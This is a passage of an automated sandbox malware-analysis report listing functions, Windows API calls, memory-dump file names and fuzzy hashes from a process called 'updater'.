Instruction Fuzzy Hash: AD4106745083419FDB24DF18C484B6ABBE1FF45318F1988ACE8999B362C376EC85CB52

Function 00BC49C2 Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC4B29: FreeLibrary.KERNEL32(00000000,?), ref: 00BC4B63

Part of subcall function 00BD547B: __wfsopen.LIBCMT ref: 00BD5486

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00BC27AF,?,00000001), ref: 00BC49F4

Part of subcall function 00BC4ADE: FreeLibrary.KERNEL32(00000000), ref: 00BC4B18

Part of subcall function 00BC48B0: _memmove.LIBCMT ref: 00BC48FA

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 5889156ff6f02f9d1eaadad9c0a2e5391fd23f233084d5fafa2060b36c165fa2
Instruction ID: 2db06eded2e92a4b086b27e1839f93c77c13dffc2f2267dfece5b6d95a9159c8
Opcode Fuzzy Hash: 5889156ff6f02f9d1eaadad9c0a2e5391fd23f233084d5fafa2060b36c165fa2
Instruction Fuzzy Hash: 8211C431690205ABCB20EB608C26FAE77E9DF44702F20846DF545A61C1EB709B11AB94

Function 00BEE3C2 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00BEE3CE

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: a03239888f1c8453d86cfbb41dce9afe1c97b4c51b26865d9f8bfde743ed5331
Instruction ID: 4607951cf9f4e35f85549e0502d363adfb426c574b80c3e0f6133eb2b367c7f2
Opcode Fuzzy Hash: a03239888f1c8453d86cfbb41dce9afe1c97b4c51b26865d9f8bfde743ed5331
Instruction Fuzzy Hash: 662110B4508341DFDB24DF14C484B6ABBE0BF84304F0989ACF98A57322D375E849CB92

Function 017C3915 Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 017C398E

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: CountTick
String ID:
API String ID: 536389180-0
Opcode ID: 43757a40a04bdb7dbcb3dc25ba38812e907c38936f01cb813da0788fd630d4d5
Instruction ID: a5257ec10b402889baa34f7656634cafafa9cd42cc2bb71ce55e98df2c9496b9
Opcode Fuzzy Hash: 43757a40a04bdb7dbcb3dc25ba38812e907c38936f01cb813da0788fd630d4d5
Instruction Fuzzy Hash: EF11E9B4E1420AAFCB00DF99D8918EEFBB8FB48714B51846EE914A7310D734AE118F90

Function 00BC4220 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,?,00010000,00000000,00000000,00000000,00000000,00010000,?,00BC3CF8,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00BC4276

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 6bd617e8df7e73b3c9c4b81bfe6288ecb245a3e0cebc7d5af3e6654a521e8581
Instruction ID: 4710de991a1e533618b6f1f718dea1b838a8de10c2d8b4022e444cb8c79c2972
Opcode Fuzzy Hash: 6bd617e8df7e73b3c9c4b81bfe6288ecb245a3e0cebc7d5af3e6654a521e8581
Instruction Fuzzy Hash: 2E1128312107019FD730CF55C491F66B7E9EF88710F14896DE9AA8AA50D770EA45CB60

Function 017C8CFB Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegSetValueExA.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 017C8D2E

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 85e355a7cd3b0e2ed4f01ebefe5e899ba4b5009004efa6d996d33ce0ba3b635a
Instruction ID: aff692e923fdd10f73fd06c738e8a369a96bf167557d703029eada6510bb7603
Opcode Fuzzy Hash: 85e355a7cd3b0e2ed4f01ebefe5e899ba4b5009004efa6d996d33ce0ba3b635a
Instruction Fuzzy Hash: ABF08171600108BFD700DAADD8C4BEEFBEC9B58264F048169F918D7254D7309E0097A1

Function 017C8CFD Relevance: 1.5, APIs: 1, Instructions: 42registryCOMMON

Download Yara Rule

APIs

RegSetValueExA.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 017C8D2E

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 15125535b536b77cc49305bd67ba977910b3568f74afcc67dc31f1fb2b344763
Instruction ID: 91db02064ce21d689c4854d920444d7d3732a5973a3438a5c0dca3196b37b736
Opcode Fuzzy Hash: 15125535b536b77cc49305bd67ba977910b3568f74afcc67dc31f1fb2b344763
Instruction Fuzzy Hash: 25F0AF71A00208BFC700EAADD8C4BDEFBEC9B58364F04816AFA18D7394D7309E0097A1

Function 00C17C7F Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 00BD0FE6: std::exception::exception.LIBCMT ref: 00BD101C
Part of subcall function 00BD0FE6: __CxxThrowException@8.LIBCMT ref: 00BD1031

_memset.LIBCMT ref: 00C17CB4

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Exception@8Throw_memsetstd::exception::exception
String ID:
API String ID: 525207782-0
Opcode ID: 31a71c8389610955d36b403cba3d32c1291e5a9eb951b23776e0cff10cec261c
Instruction ID: 4b3fdef23748fdd34cccfe75c9cbd4666e9bb85374d511443c1925ba67a02024
Opcode Fuzzy Hash: 31a71c8389610955d36b403cba3d32c1291e5a9eb951b23776e0cff10cec261c
Instruction Fuzzy Hash: 1F01E4742042009FD321EF5CD541F46BBE1AF69310F24849AF5888B392EB72A8409B91

Function 017B2A91 Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

LoadStringA.USER32(00000000,00010000,?,00001000), ref: 017B2AC3

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: 98cb9e290b6fcda0473899373f779afeb580b28c0de553bc535e0dfee71ead7e
Instruction ID: 10822b2a11afd8eb581740e258359d5ffae60b62b1c22ee20e7632e2f0003b7d
Opcode Fuzzy Hash: 98cb9e290b6fcda0473899373f779afeb580b28c0de553bc535e0dfee71ead7e
Instruction Fuzzy Hash: 42F03075701511AFCB21EA9CD8C4BD7B3DC9B5C790B048061B948CB35DEB60ED8487A2

Function 00BEDC5A Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

Part of subcall function 00BD0FE6: std::exception::exception.LIBCMT ref: 00BD101C
Part of subcall function 00BD0FE6: __CxxThrowException@8.LIBCMT ref: 00BD1031

_memmove.LIBCMT ref: 00BEDC8B

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Exception@8Throw_memmovestd::exception::exception
String ID:
API String ID: 1602317333-0
Opcode ID: 18cb4b1cd493cf7211d6da5a866951763f4ccdbc52a46301f8602edeb8946697
Instruction ID: 9f40fad19eb0bc1240e2551abda0c88ddf6332cce9b02584247f1e357b6cfe5d
Opcode Fuzzy Hash: 18cb4b1cd493cf7211d6da5a866951763f4ccdbc52a46301f8602edeb8946697
Instruction Fuzzy Hash: 45F0E7746041019FD714EF68C981E15BBE1FF1A340F24849DE1898B3A2E772E811CB91

Function 00BC4A8C Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

_fseek.LIBCMT ref: 00BC4AA4

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: _fseek
String ID:
API String ID: 2937370855-0
Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
Instruction ID: 680f3ff997ce8463e2295426287749669cb29a36dc2c1c9e5eb02081c7ebb6c5
Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
Instruction Fuzzy Hash: 92F085B6500208BFDF108F84DC00DEBBBB9EB89720F10419CF9045A210D232EA21CBA0

Function 00BC4A2F Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,00BC27AF,?,00000001), ref: 00BC4A63

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 4cf1cb9ae5ac6926ca2ca5617f7d3a831d3dbd036ab5623e122dc8d59901be1a
Instruction ID: c2b9340a45cec71898e68da6132647861d551936e3a80f64eed867189635648e
Opcode Fuzzy Hash: 4cf1cb9ae5ac6926ca2ca5617f7d3a831d3dbd036ab5623e122dc8d59901be1a
Instruction Fuzzy Hash: 2EF0F275145B01CFCB349F64E4A0A2ABBF0EB14329320A9AEF5A682610C7319A84DF44

Function 00BC4AB2 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00BC4AD0

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
Instruction ID: 5edee0154e9d0adecb1800104e3c66692a112a27c3ade4c091859bca71b4dc4d
Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
Instruction Fuzzy Hash: E9F0F87240020DFFDF05CF94C941EAABBB9FB14314F218589F9198A252D336DB21EBA1

Function 00BF0A79 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00BF0A84

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: c36b6fa1b4025dc65d616c034aca338a8af3630aa77aa3a209db6df2e27683b8
Instruction ID: fe56e0fc038b53e2913b14797a8a40f74ccaa3c315c78b4132b5779dd863c611
Opcode Fuzzy Hash: c36b6fa1b4025dc65d616c034aca338a8af3630aa77aa3a209db6df2e27683b8
Instruction Fuzzy Hash: 23E0ABB17183095FE730AB68D440776FBC8EF00310F1044DAC58582352E7B1D89897A1

Function 017B1F31 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00BB0000,?,00000105), ref: 017B1F4F

Part of subcall function 017B21C5: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 017B21E0
Part of subcall function 017B21C5: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 017B21FE
Part of subcall function 017B21C5: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 017B221C
Part of subcall function 017B21C5: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 017B223A
Part of subcall function 017B21C5: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,017B22C9,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 017B2283
Part of subcall function 017B21C5: RegQueryValueExA.ADVAPI32(?,017B2445,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,017B22C9,?,80000001), ref: 017B22A1
Part of subcall function 017B21C5: RegCloseKey.ADVAPI32(?,017B22D0,00000000,00000000,00000005,00000000,017B22C9,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 017B22C3

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: Open$FileModuleNameQueryValue$Close
String ID:
API String ID: 2796650324-0
Opcode ID: 4f6f7f1076de1bd117e32dae873e78de734a710e1bc72a608b831ebaeac8ce49
Instruction ID: 80ee1f8ffcb7a879fa92443541e3da7eec9a486e44da8e60be6d773ed80c99b7
Opcode Fuzzy Hash: 4f6f7f1076de1bd117e32dae873e78de734a710e1bc72a608b831ebaeac8ce49
Instruction Fuzzy Hash: 74E06D75A012149FCB10DE5CC8C4B8777D8AB08750F400951ADA4CF24BD3B0D9108BE0

Function 00BD09C5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00BD09E4

Part of subcall function 00BC1821: _memmove.LIBCMT ref: 00BC185B

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: a48b57471a876105d282413007b5d85ecf96428afa29f921c186c44136ad10d7
Instruction ID: 730a694c6b91b785c634ab94412bbe7a94c7c77e7df54ae804930eb097028360
Opcode Fuzzy Hash: a48b57471a876105d282413007b5d85ecf96428afa29f921c186c44136ad10d7
Instruction Fuzzy Hash: 0EE0863690412857C72196AC9C05FEE77DDEB8A691F1402F6FD08D7214D9709C8186D1

Function 017B4735 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,017C6337,00000000,017C8747,017C88ED,?,c:\,017C88ED,?,c:\), ref: 017B4740

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 4572904268e265fd193fcb2e56680a69fd8facc4a158caf36c05ddde75ad2af6
Instruction ID: 6ab44a28e0f96394e982463c3a88ff34319a57bd278ed6528165e7541212a92a
Opcode Fuzzy Hash: 4572904268e265fd193fcb2e56680a69fd8facc4a158caf36c05ddde75ad2af6
Instruction Fuzzy Hash: 75C08CA02122040A2E10A9BC1CC87DAC28C8916034F601A21E13BC21C7E311E4222410

Function 00BC42AE Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00C006E6,00000000,00000000,00000000), ref: 00BC42BF

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: f1a14d51a9fa068dbe2b165c1ffa01307ca8564d9c9fbdfa28779385199ce8e0
Instruction ID: 51ab65946832c95050f0b45b5e19cfada075da420b1bb4d4308458596e4bb8ce
Opcode Fuzzy Hash: f1a14d51a9fa068dbe2b165c1ffa01307ca8564d9c9fbdfa28779385199ce8e0
Instruction Fuzzy Hash: C1D0C77464020CBFEB10CB80DC46FAD777CEB05710F200194FE0466290D6B27D508795

Function 00BB13C7 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00BB13C8

Part of subcall function 00BB29E2: GetWindowLongW.USER32(?,000000EB), ref: 00BB29F3

Part of subcall function 00BB2714: GetCursorPos.USER32(?), ref: 00BB2727
Part of subcall function 00BB2714: ScreenToClient.USER32(00C777B0,?), ref: 00BB2744
Part of subcall function 00BB2714: GetAsyncKeyState.USER32(00000001), ref: 00BB2769
Part of subcall function 00BB2714: GetAsyncKeyState.USER32(00000002), ref: 00BB2777

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: AsyncStateWindow$ClientCursorForegroundLongScreen
String ID:
API String ID: 4074248120-0
Opcode ID: cfed14185f19884c82c57c3d5b6c3f1eb1f21879a08dca24479e04b2d9d4ca28
Instruction ID: 691690b1598c1aa038d160e5cee9d0bcc5de3a1dbd94fe8687a19a0ca1b46b3f
Opcode Fuzzy Hash: cfed14185f19884c82c57c3d5b6c3f1eb1f21879a08dca24479e04b2d9d4ca28
Instruction Fuzzy Hash: 1DD0A7702000145BCA19BB1CDC99FAE37D1FF45320B244B95F4298B2F1CBB11C92CAE6

Function 017B4A4D Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNEL32(00000000,00000000,?,017C6342,00000000,017C8747,017C88ED,?,c:\,017C88ED,?,c:\), ref: 017B4A5A

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: 2afb928ea0769a03e65cdb2334b4541331df32d5787a6e4dcd60dacd8e68de1d
Instruction ID: 1a1908ffefc94368de0777443386a8e6e1c4368e1f621525589920d03c417336
Opcode Fuzzy Hash: 2afb928ea0769a03e65cdb2334b4541331df32d5787a6e4dcd60dacd8e68de1d
Instruction Fuzzy Hash: 11B012927713451AEF0039F91CDDF6EC09CD72C80AF500C31F121C614BD767C8190050

Function 00BD547B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00BD5486

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: f5ebaa9fa4f1da1ebb9f3540c2a2d8b53950eea62fe10187594e22a1fd352422
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: B7B0927A44020C77CE112A82EC03A597B699B40669F408061FB0C1C262B673A6A09A8A

Function 00C1D6BE Relevance: 1.4, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000002,00000000), ref: 00C1D842

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 025d66b94d4b5c33e124ba965903ef86c915e4a8cef776d42f7514df52783383
Instruction ID: f0c9ecac95d6497878af75abb4baa363dd963c241099f4110dfe51fa1006c604
Opcode Fuzzy Hash: 025d66b94d4b5c33e124ba965903ef86c915e4a8cef776d42f7514df52783383
Instruction Fuzzy Hash: 227172342043028FD714EF68D491FAEB7E0AF86354F444A6DF4969B2A2DB30ED45DB92

